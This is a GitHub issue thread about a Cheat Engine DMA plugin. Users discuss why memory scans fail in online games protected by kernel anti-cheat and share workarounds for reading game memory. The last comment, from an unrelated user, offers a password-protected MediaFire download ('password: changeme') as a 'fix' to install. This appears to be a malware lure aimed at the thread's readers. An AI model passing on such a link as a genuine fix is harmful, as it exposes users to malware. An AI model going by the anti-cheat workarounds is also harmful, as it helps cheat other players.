### ISSUE TITLE
Search function won't works if kernel AC is running

### ISSUE THREAD

**Issue by Faaw** [kaijia2022/Cheat-Engine-DMA-Plugin#3]
Unfortunately, your plugin have the same problem as Metick ce dma plugin, cheatengine can't scan & find value in the game .exe. Always the same error "No readable memory found". However as you can see in the screenshot, reading address from Memory View works fine, only the Scan function is broken when trying to scan the game .exe
Tried ReClass Scan function, exactly the same issue, 0 result found

Dungeonborne
![6INYX5f](https://github.com/user-attachments/assets/151b6544-6fe4-4bf2-8643-0ba2d0c2f178)

PUBG
![K9WzgNj](https://github.com/user-attachments/assets/e02c5a1a-fb35-446a-92f9-4369294e96ff)

Basically its any game anyways. If I try to Scan outside of the game .exe, it works fine.

if anyone already got the issue? I asked my friend to try (just in case its a problem on my side only) but he have the same error.

**Comment by kaijia2022** [comment]
Hi Faaw, I am not sure what is causing your issue. It could be that you are attaching to the wrong TslGames.exe

![pubg task explorer](https://github.com/user-attachments/assets/da600284-a51e-41b8-97ec-0341ebf009ac)

Make sure you attach to the second one.

![pubg debug](https://github.com/user-attachments/assets/b2d8a5c8-6391-4711-a5c6-0ff95787acfd)

And it should work fine.

The  "Scan Error: controller: No Readable Memory Found" error raises usually because CE cannot find any scanable memory region.

**Comment by Faaw** [comment]
No of course I double checked that its the correct .exe
pid: 5248 (hex 1480)
![mqIInwJ 1](https://github.com/user-attachments/assets/0b1b6e74-d528-42b2-8f86-da1f229430ef)

Please make sure to change your Memory Scan Options to the game .exe (here TslGame.exe) like this and try again:
![rggYBoJ](https://github.com/user-attachments/assets/878fd9f0-6396-4683-ab9e-771be4dfed3c)

**Comment by kaijia2022** [comment]
I see what you mean. I don't think it is related to kernal AC, I tested on CS2 and it also does not work. 
It is likely related to how I implemented the virtualquery function, I'll look into it.

**Comment by Faaw** [comment]
> I see what you mean. I don't think it is related to kernal AC, I tested on CS2 and it also does not work, not for any modules. It is likely related to how I implemented the virtualquery function, I'll look into it.

I updated to the latest version all my memproc dll (vmm, leechcore etc) and now Metick's CE plugin works on most games (tested pubg, apex, cs2)
but its not working on game that use ACE ac.
I tried Dungeonborne and also Delta Force and both game get me the error "No readable memory found"

I read on blogpost from Arena Breakout Infinite (which also use ACE ac) this:
![rEbrYDk 1](https://github.com/user-attachments/assets/532e874e-dc99-43f4-8efc-64735d577278)
maybe it explain why Scan function is broken on those game that use ACE ac, but we still can read memory without issue with Memory View, just we cant use Scan function in the game .exe memory region

About your CE plugin, sadly updating dll didnt change anything, im getting the error on most games just as you.

**Comment by kaijia2022** [comment]
For now, just use the default, specify the scan region to "all", memscan and pointer scanning works fine in the case.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
